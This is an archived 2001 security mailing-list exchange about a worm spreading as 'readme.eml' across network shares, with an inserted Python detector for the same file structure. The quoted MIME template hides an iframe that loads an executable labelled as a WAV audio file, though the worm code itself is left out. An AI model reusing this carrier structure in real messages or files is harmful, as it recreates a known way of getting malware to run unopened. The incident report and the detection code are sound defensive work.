RE: New worm? 'readme.eml'

From: Mark Ng (hostmasterat_private)
Date: Tue Sep 18 2001 - 08:51:00 PDT

    I've just seen this infest an NT share.  I've isolated it to one drive (this
    machine is a fileserver with no access of its own to the internet).
    Further following behaviour, this worm copies itself into available
    directories (I think using a client machine, as this is restricted to one
    drive only one department has access to), naming itself the same as other
    files in that directory, except as a .eml.  Upon opening in a text editor,
    the same content as described below by Pedro appears.
    
    >
    > 
    > When I connected to the originating server (femm.tdkomm.com.br), I 
    > saw the normal web page for the institution, plus a pop-up window for 
    > http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as 
    > follows:
    > 
    > 
    > MIME-Version: 1.0
    > Content-Type: multipart/related;
    > type="multipart/alternative";
    > boundary="====_ABC1234567890DEF_===="
    > X-Priority: 3
    > X-MSMail-Priority: Normal
    > X-Unsent: 1
    > 
    > --====_ABC1234567890DEF_====
    > Content-Type: multipart/alternative;
    > boundary="====_ABC0987654321DEF_===="
    > 
    > --====_ABC0987654321DEF_====
    > Content-Type: text/html;
    > charset="iso-8859-1"
    > Content-Transfer-Encoding: quoted-printable
    > 
    > 
    > <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
    > <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
    > </iframe></BODY></HTML>
    > --====_ABC0987654321DEF_====--
    > 
    > --====_ABC1234567890DEF_====
    > Content-Type: audio/x-wav;
    > name="readme.exe"
    > Content-Transfer-Encoding: base64
    > Content-ID: <EA4DMGBP9p>
    > 
    > ... (worm code follows)
    > 
    > I've inspected the executable code, and it reads like a worm. (doh)
    > 
    > Has anyone seen this?
    > 
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
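A defender-side check for the MIME structure quoted above, added here as an example and not code from either poster: it parses a constructed message of the same shape (the binary body replaced by a 16-byte stub) and flags a Content-ID part that is loaded by a hidden iframe via cid:, carries an executable filename under a non-executable Content-Type, or begins with an MZ header. Function names, the sample boundaries and the stub are assumptions.

```python
import re
from email import message_from_string
# Constructed sample shaped like the quoted readme.eml; the base64 body is a 16-byte MZ stub, not the worm
SAMPLE = """MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="outer"

--outer
Content-Type: multipart/alternative; boundary="inner"

--inner
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY bgColor=3D#ffffff><iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0></iframe></BODY></HTML>
--inner--
--outer
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AAA==
--outer--
"""
EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat")

def cid_iframe_refs(html):  # Content-IDs loaded by <iframe src="cid:..."> tags in an HTML part
    return set(re.findall(r'<iframe[^>]*src=["\']?cid:([^"\'\s>]+)', html, re.I))

def analyze(raw):
    # One finding per Content-ID part that looks like a smuggled executable
    msg = message_from_string(raw)
    refs = set()
    for part in msg.walk():  # pass 1: which cid: targets does the HTML pull in?
        if part.get_content_type() == "text/html":  # decode=True undoes quoted-printable
            refs |= cid_iframe_refs(part.get_payload(decode=True).decode("iso-8859-1", "replace"))
    findings = []
    for part in (p for p in msg.walk() if p.get("Content-ID")):  # pass 2: inspect cid parts
        cid = part["Content-ID"].strip("<>")
        name = part.get_filename() or ""             # falls back to the name= parameter
        data = part.get_payload(decode=True) or b""  # decode=True undoes base64
        reasons = [text for hit, text in (
            (cid in refs, "loaded by a hidden iframe via cid:"),
            (name.lower().endswith(EXEC_EXT),
             f"executable name {name!r} declared as {part.get_content_type()}"),
            (data.startswith(b"MZ"), "body begins with an MZ (PE) header"),
        ) if hit]
        if reasons:
            findings.append({"cid": cid, "name": name, "reasons": reasons})
    return findings
```

Running analyze(SAMPLE) returns a single finding for readme.exe with all three reasons; a legitimate multipart/related mail with an inline image referenced by cid: trips none of them.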
    



    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 13:26:52 PDT